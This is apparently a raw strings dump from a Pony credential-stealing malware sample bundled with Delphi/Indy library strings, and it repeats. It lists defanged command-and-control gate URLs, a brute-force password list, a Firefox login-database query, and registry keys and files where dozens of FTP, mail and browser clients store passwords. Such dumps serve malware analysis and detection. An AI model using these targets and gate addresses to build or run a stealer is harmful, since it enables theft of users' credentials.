%slibeay32.dllssleay32.dlllibssl32.dllC:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSLHeaders.pasSSL_CTX_use_PrivateKey_fileSSL_CTX_use_PrivateKeySSL_CTX_use_certificateSSL_CTX_use_certificate_fileSSL_get_peer_certificateSSL_CTX_set_default_passwd_cbSSL_CTX_set_default_passwd_cb_userdataSSL_CTX_check_private_keyX509_STORE_add_certX509_STORE_CTX_get_current_certi2d_DSAPrivateKeyd2i_DSAPrivateKeyd2i_PrivateKeyd2i_PrivateKey_bioDES_set_key_ossl_old_des_set_keyRSA_generate_keyRSA_check_keyRSA_generate_key_exi2d_PrivateKey_bioi2d_RSAPrivateKeyd2i_RSAPrivateKeyi2d_RSAPublicKeyd2i_RSAPublicKeyi2d_PrivateKeyi2d_NETSCAPE_CERT_SEQUENCEX509_get_default_cert_fileX509_get_default_cert_file_envX509_set_pubkeyX509_REQ_set_pubkeyPEM_read_bio_RSAPrivateKeyPEM_read_bio_RSAPublicKeyPEM_read_bio_DSAPrivateKeyPEM_read_bio_PrivateKeyPEM_read_bio_NETSCAPE_CERT_SEQUENCEPEM_write_bio_RSAPublicKeyPEM_write_bio_DSAPrivateKeyPEM_write_bio_PrivateKeyPEM_write_bio_NETSCAPE_CERT_SEQUENCEPEM_write_bio_PKCS8PrivateKeyEVP_PKEY_typeEVP_PKEY_newEVP_PKEY_freeEVP_PKEY_assignC:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSL.passecur32.dllsecurity.dllC:\Builds\TP\indysockets\lib\protocols\IdHTTP.pasapplication/x-www-form-urlencodedhttpsHTTP/1.0 200 OKHTTP/%s, ClassID: %solepro32.dll%d - %sC:\Builds\TP\vcl\OleServer.pasloginpasswdggg.txthXXps://people.live.comhXXps://people.live.com/export?canary=hXXp://91.108.68.202/up.phphXXps://mail.google.com/mail/u/0/h/1ueaawj88elpf/?&v=cl&pnl=aPasswdSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNfirefoxfirefox.exeiexplore.exechromechrome.exeVVV.hotmail.comhXXp://VVV.gmail.comhXXps://login.globo.com/login/1948hXXps://login.globo.com/login/1Kernel32.dllOpen SSL Support DLL Delphi and C Builder interfacehXXp://VVV.indyproject.org/1993 - 2009JPEG error #%dUnsupported operation./Could not encode header data using charset "%s"OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersDCOM not installed"'%s' is not a valid property valueOLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s&Cannot change the size of a JPEG imageSSL status: "%s"%s Alert%s Read Alert%s Write AlertHandshake DonepUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported$Error accepting connection with SSL.Error creating SSL context. Could not load root certificate.Could not load certificate.#Could not load key, check password.Mode has not been set.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properlyNo credential handle acquiredBCan not change credentials after handle aquired. Use Release first4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.KUnsupported hash algorithm. This implementation supports only MD5 encoding.The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the clientThe logon attempt failed;The credentials supplied to the package were not recognized UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.Reply Code is not valid: %sReply Code already exists: %sIOHandler value is not valid'Algorithm %s not permitted in FIPS modeUnknown Protocol(Request method requires HTTP version 1.1File "%s" not foundObject type not supported.Transparent proxy cannot bind.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.Command not supported.Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.Invalid Port Range (%d - %d)%s is not a valid service.%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.End of stream: Class %s at %d)UDP is not support in this SOCKS version.Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.Socket operation on non-socket.Protocol not supported.Socket type not supported."Operation not supported on socket.Protocol family not supported.0Address family not supported by protocol family.Resolving hostname %s.Connecting to %s.Socket Error # %dOperation would block.Operation now in progress.Operation already in progress.Invalid clipboard format Clipboard does not support IconsCannot open clipboard: %sText exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)Grid too large for operation Too many rows or columns deletedInvalid input value7Invalid input value. Use escape key to abandon changes%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parentInvalid operation on TOleGraphic$Unknown picture file extension (.%s)Unsupported clipboard formatError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'No help found for context %dNo help found for %sScan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC ImageThread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread9Cannot call SetReturnValue on an externally create thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 andInvalid Timeout value: %s#''%s'' is not a valid integer valueList index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM classError reading %s%s%s: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sInvalid file name - %sInvalid stream format$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)Invalid destination array"Character index out of bounds (%d)Start index out of bounds (%d)Invalid count (%d)Invalid destination index (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadExternal exception %xInterface not supportedObject lock not owned(Monitor support function not initialized%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.Invalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pOperation aborted(Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supported'%d.%d' is not a valid timestampI/O error %dInteger overflow Invalid floating point operationp.exe_1536:.text`.datapassword12345678password1monkey12345671234567897777777assholemickeypassw0rdsmokeyhockey11111111windows1234567890hXXp://bigbone10.info/pony/gate.phphXXp://bigbone10.info:8080/pony/gate.phpSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallkernel32.dllnetapi32.dllole32.dlladvapi32.dllCryptGetUserKeyCryptExportKeyCryptDestroyKeycrypt32.dllCertOpenSystemStoreACertEnumCertificatesInStoreCertCloseStoreCryptAcquireCertificatePrivateKeymsi.dllpstorec.dll^shell32.dllSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersexplorer.exePOST %s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98){X-X-X-XX-XXXXXX}Software\Far\Plugins\FTP\HostsSoftware\Far2\Plugins\FTP\HostsSoftware\Far Manager\Plugins\FTP\HostsSoftware\Far\SavedDialogHistory\FTPHostSoftware\Far2\SavedDialogHistory\FTPHostSoftware\Far Manager\SavedDialogHistory\FTPHostPasswordwcx_PTF.iniFtpIniNameSoftware\Ghisler\Windows Commander\Ipswitch\WS_FTP\win.iniWS_FTPCUTEFTPSoftware\GlobalSCAPE\CuteFTP 6 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar\GlobalSCAPE\CuteFTP\GlobalSCAPE\CuteFTP Pro\GlobalSCAPE\CuteFTP Lite\CuteFTP\sm.dat\Sites.dat\Quick.dat\History.dat\sitemanager.xml\recentservers.xml\filezilla.xmlPortServer.HostServer.UserServer.PassServer.PortLast Server PassLast Server PortFTP NavigatorFTP Commanderftplist.txtSoftware\BPFTP\Bullet Proof FTP\MainSoftware\BulletProof Software\BulletProof FTP Client\MainSoftware\BPFTP\Bullet Proof FTP\OptionsSoftware\BulletProof Software\BulletProof FTP Client\OptionsSoftware\BPFTP\SmartFTPFavorites.datHistory.dataddrbk.datquick.dat\TurboFTPSoftware\TurboFTPSoftware\Sota\FFFTPSoftware\Sota\FFFTP\OptionsSoftware\FTPWare\COREFTP\Sitesprofiles.xml\FTP ExplorerSoftware\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Software\FTP Explorer\ProfilesPasswordTypeLoginFtpSite.xml\sites.xml\FTPRushRushSite.xmlFtpPortSoftware\Cryer\WebSitePublisherbitkinex.ds\drives.js"password" : "_PasswordSoftware\NCH Software\ClassicFTP\FTPAccountsFtpServerFtpUserNameFtpPassword_FtpPasswordFtpDirectorySoftware\FTPClient\SitesSoftware\SoftX.org\FTPClient\Sitesftplast.osd\SharedSettings.ccs\SharedSettings_1_0_5.ccs\SharedSettings.sqlite\SharedSettings_1_0_5.sqliteleapftpunleap.exesites.datsites.ini\LeapWare\LeapFTPPortNumber\32BitFtp.iniNDSites.iniPassWordSoftware\South River Technologies\WebDrive\ConnectionsFTP CONTROLFTPCONhXXp://hXXps://PTF://operawand.dat_Software\Opera SoftwareOpera.HTML\shell\open\commandwiseftpsrvs.binSOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}wiseftpsrvs.iniwisePTF.iniFTPVoyager.ftpFTPVoyager.qc\RhinoSoft.comnss3.dllPK11_GetInternalKeySlotsqlite3.dllsqlite3_opensqlite3_closesqlite3_preparesqlite3_stepsqlite3_column_bytessqlite3_column_blobmozsqlite3.dllprofiles.iniPathToExeprefs.jssignons.sqlitesignons.txtsignons2.txtsignons3.txtSELECT hostname, encryptedUsername, encryptedPassword FROM moz_loginsFirefox\Mozilla\Firefox\Software\MozillafireFTPsites.datSeaMonkey\Mozilla\SeaMonkey\Mozilla\Mozilla\Profiles\Software\LeechFTPbookmark.datSiteInfo.QFPWinFTPsites.dbCLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32servers.xml\FTPGetterESTdb2.datQData.dat\Estsoft\ALFTPMS IE FTP PasswordsSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3loginsorigin_urlpassword_value\Google\Chrome\ChromePlusSoftware\ChromePlus\NichromeStaff-FTPSM.archFreshFTPBlazeFtpsite.datLastPasswordLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtpFTP .Link\shell\open\commandGoFTPConnections.txt3D-FTP\3D-FTPSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTPpassword 51:b:FTP NowFTPNowSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%d2.5.29.37Software\LinasFTP\Site Manager.duckuser.configNppFTP.xmlFTP destination serverFTP destination userFTP destination passwordFTP destination portFTP destination catalogFTP profilesFTPShellftpshell.fsiSoftware\MAS-Soft\FTPInfo\Setup\FTPInfoServerList.xmlftpsite.iniFTPList.db\MapleStudio\ChromePlusSoftware\Nico Mak Computing\WinZip\FTPMy FTPproject.ini{74FF1730-B1F2-4D88-926B-1568FAE61DB7}NovaFTP.db\INSoftware\NovaFTP.oeaccount\Microsoft\Windows Live MailSoftware\Microsoft\Windows Live Mail\Microsoft\Windows MailSoftware\Microsoft\Windows MailMailbox.ini\PocoSystem.iniaccounts.iniPopPortPopPasswordSmtpServerSmtpPortSmtpAccountSmtpPasswordaccount.cfgaccount.cfnDir #%dSMTP Email AddressSMTP ServerSMTP User NameHTTP UserHTTP Server URLHTTPMail User NameHTTPMail ServerSMTP UserPOP3 PortSMTP PortIMAP PortPOP3 Password2IMAP Password2NNTP Password2HTTPMail Password2SMTP Password2POP3 PasswordIMAP PasswordNNTP PasswordHTTP PasswordSMTP PasswordSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlookinetcomm server passwordsoutlook account manager passwordsSTATUS-IMPORT-OK%d.batShellExecuteAshell32.dll;3 #>6.&'2, / 0&7!4-)1#GetWindowsDirectoryAuser32.dllRegOpenKeyExARegCloseKeyRegOpenKeyARegEnumKeyExARegCreateKeyAInternetCrackUrlAInternetCreateUrlAwininet.dllshlwapi.dllwsock32.dlluserenv.dll2hXXp://VVV.facebook.com/xthpt/:w/wwf.cabeoo.koc/mp.exe_1536_rwx_00400000_00016000:.text`.datapassword12345678password1monkey12345671234567897777777assholemickeypassw0rdsmokeyhockey11111111windows1234567890hXXp://bigbone10.info/pony/gate.phphXXp://bigbone10.info:8080/pony/gate.phpSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallkernel32.dllnetapi32.dllole32.dlladvapi32.dllCryptGetUserKeyCryptExportKeyCryptDestroyKeycrypt32.dllCertOpenSystemStoreACertEnumCertificatesInStoreCertCloseStoreCryptAcquireCertificatePrivateKeymsi.dllpstorec.dll^shell32.dllSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersexplorer.exePOST %s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98){X-X-X-XX-XXXXXX}Software\Far\Plugins\FTP\HostsSoftware\Far2\Plugins\FTP\HostsSoftware\Far Manager\Plugins\FTP\HostsSoftware\Far\SavedDialogHistory\FTPHostSoftware\Far2\SavedDialogHistory\FTPHostSoftware\Far Manager\SavedDialogHistory\FTPHostPasswordwcx_PTF.iniFtpIniNameSoftware\Ghisler\Windows Commander\Ipswitch\WS_FTP\win.iniWS_FTPCUTEFTPSoftware\GlobalSCAPE\CuteFTP 6 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar\GlobalSCAPE\CuteFTP\GlobalSCAPE\CuteFTP Pro\GlobalSCAPE\CuteFTP Lite\CuteFTP\sm.dat\Sites.dat\Quick.dat\History.dat\sitemanager.xml\recentservers.xml\filezilla.xmlPortServer.HostServer.UserServer.PassServer.PortLast Server PassLast Server PortFTP NavigatorFTP Commanderftplist.txtSoftware\BPFTP\Bullet Proof FTP\MainSoftware\BulletProof Software\BulletProof FTP Client\MainSoftware\BPFTP\Bullet Proof FTP\OptionsSoftware\BulletProof Software\BulletProof FTP Client\OptionsSoftware\BPFTP\SmartFTPFavorites.datHistory.dataddrbk.datquick.dat\TurboFTPSoftware\TurboFTPSoftware\Sota\FFFTPSoftware\Sota\FFFTP\OptionsSoftware\FTPWare\COREFTP\Sitesprofiles.xml\FTP ExplorerSoftware\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Software\FTP Explorer\ProfilesPasswordTypeLoginFtpSite.xml\sites.xml\FTPRushRushSite.xmlFtpPortSoftware\Cryer\WebSitePublisherbitkinex.ds\drives.js"password" : "_PasswordSoftware\NCH Software\ClassicFTP\FTPAccountsFtpServerFtpUserNameFtpPassword_FtpPasswordFtpDirectorySoftware\FTPClient\SitesSoftware\SoftX.org\FTPClient\Sitesftplast.osd\SharedSettings.ccs\SharedSettings_1_0_5.ccs\SharedSettings.sqlite\SharedSettings_1_0_5.sqliteleapftpunleap.exesites.datsites.ini\LeapWare\LeapFTPPortNumber\32BitFtp.iniNDSites.iniPassWordSoftware\South River Technologies\WebDrive\ConnectionsFTP CONTROLFTPCONhXXp://hXXps://PTF://operawand.dat_Software\Opera SoftwareOpera.HTML\shell\open\commandwiseftpsrvs.binSOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}wiseftpsrvs.iniwisePTF.iniFTPVoyager.ftpFTPVoyager.qc\RhinoSoft.comnss3.dllPK11_GetInternalKeySlotsqlite3.dllsqlite3_opensqlite3_closesqlite3_preparesqlite3_stepsqlite3_column_bytessqlite3_column_blobmozsqlite3.dllprofiles.iniPathToExeprefs.jssignons.sqlitesignons.txtsignons2.txtsignons3.txtSELECT hostname, encryptedUsername, encryptedPassword FROM moz_loginsFirefox\Mozilla\Firefox\Software\MozillafireFTPsites.datSeaMonkey\Mozilla\SeaMonkey\Mozilla\Mozilla\Profiles\Software\LeechFTPbookmark.datSiteInfo.QFPWinFTPsites.dbCLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32servers.xml\FTPGetterESTdb2.datQData.dat\Estsoft\ALFTPMS IE FTP PasswordsSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3loginsorigin_urlpassword_value\Google\Chrome\ChromePlusSoftware\ChromePlus\NichromeStaff-FTPSM.archFreshFTPBlazeFtpsite.datLastPasswordLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtpFTP .Link\shell\open\commandGoFTPConnections.txt3D-FTP\3D-FTPSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTPpassword 51:b:FTP NowFTPNowSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%d2.5.29.37Software\LinasFTP\Site Manager.duckuser.configNppFTP.xmlFTP destination serverFTP destination userFTP destination passwordFTP destination portFTP destination catalogFTP profilesFTPShellftpshell.fsiSoftware\MAS-Soft\FTPInfo\Setup\FTPInfoServerList.xmlftpsite.iniFTPList.db\MapleStudio\ChromePlusSoftware\Nico Mak Computing\WinZip\FTPMy FTPproject.ini{74FF1730-B1F2-4D88-926B-1568FAE61DB7}NovaFTP.db\INSoftware\NovaFTP.oeaccount\Microsoft\Windows Live MailSoftware\Microsoft\Windows Live Mail\Microsoft\Windows MailSoftware\Microsoft\Windows MailMailbox.ini\PocoSystem.iniaccounts.iniPopPortPopPasswordSmtpServerSmtpPortSmtpAccountSmtpPasswordaccount.cfgaccount.cfnDir #%dSMTP Email AddressSMTP ServerSMTP User NameHTTP UserHTTP Server URLHTTPMail User NameHTTPMail ServerSMTP UserPOP3 PortSMTP PortIMAP PortPOP3 Password2IMAP Password2NNTP Password2HTTPMail Password2SMTP Password2POP3 PasswordIMAP PasswordNNTP PasswordHTTP PasswordSMTP PasswordSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlookinetcomm server passwordsoutlook account manager passwordsSTATUS-IMPORT-OK%d.batShellExecuteAshell32.dll;3 #>6.&'2, / 0&7!4-)1#GetWindowsDirectoryAuser32.dllRegOpenKeyExARegCloseKeyRegOpenKeyARegEnumKeyExARegCreateKeyAInternetCrackUrlAInternetCreateUrlAwininet.dllshlwapi.dllwsock32.dlluserenv.dll2hXXp://VVV.facebook.com/xthpt/:w/wwf.cabeoo.koc/m3Q3b3r3>